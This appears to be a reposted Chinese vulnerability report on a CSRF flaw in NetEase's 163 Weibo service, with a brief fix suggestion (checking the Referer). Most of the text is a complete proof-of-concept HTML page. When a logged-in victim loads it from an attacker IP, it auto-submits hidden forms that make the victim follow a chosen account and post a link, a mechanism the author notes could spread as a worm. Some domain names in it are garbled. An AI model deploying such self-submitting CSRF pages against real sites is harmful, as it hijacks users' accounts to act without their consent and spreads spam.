1、登陆http://t.163测试数据 2、访问http://50.19.159.231/163.html 3、回到微博首页,自动发微博加关注 漏洞 证明: < html > <head> <title>163 weibo csrf test</title> <script type="text/javascript"> //follow me function addF(){ document.getElementById("addF").submit(); } //add twitter function addT(){ document.getElementById("addT").submit(); } </script> </head> <body onload="addF();addT();"> <form target="addFF" id="addF" method="POST" action="http://t.163测试数据/relation.do?method=follow"> <input type="text" name="userId" value="-648356100822396112"> <input type="submit" value="go"> </form> <form target="addTF" id="addT" method="POST" action="http://t.163测试数据/tweet.do?method=addTweet"> <input type="text" name="content" value="http://163.fm/ HdhCmsTest2cto测试数据 "> <input type="submit" value="go"> </form> <iframe name="addFF"></iframe> <iframe name="addTF"></iframe> </body> </html> 修复方案: 检查referer 作者 PiaCa
查看更多关于网易微博CSRF漏洞 可能造成蠕虫 - 网站安全 - 自学的详细内容...